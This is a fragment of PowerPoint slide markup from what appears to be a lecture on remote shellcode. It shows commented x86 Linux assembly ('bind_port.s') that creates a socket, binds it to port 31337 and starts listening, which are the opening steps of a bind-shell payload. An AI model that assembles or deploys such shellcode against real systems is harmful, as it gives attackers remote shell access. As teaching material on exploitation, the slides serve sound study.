              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; Build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> array: { protocol = 0,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push BYTE 0x2     ;                    AF_INET = 2 }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to argument array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; After </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> has socket file descriptor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; save socket FD in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> for later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; bind(s, [2, 31337, 0], 16)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push BYTE 0x66    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #102)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 2 = SYS_BIND = bind()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; Build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:  INADDR_ANY = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push WORD 0x697a  ;   (in reverse order)    PORT = 31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push WORD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ;                         AF_INET = 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push BYTE 16      ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) = 16,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ;         server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> pointer,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ;         socket file descriptor }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = argument array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0 on success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="467951307"/>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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bind_port.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (part 2/2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1678394"/>
            <a:ext cx="7704856" cy="3013646"/>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endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; listen(s, 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> BYTE al, 0x66 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #102)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
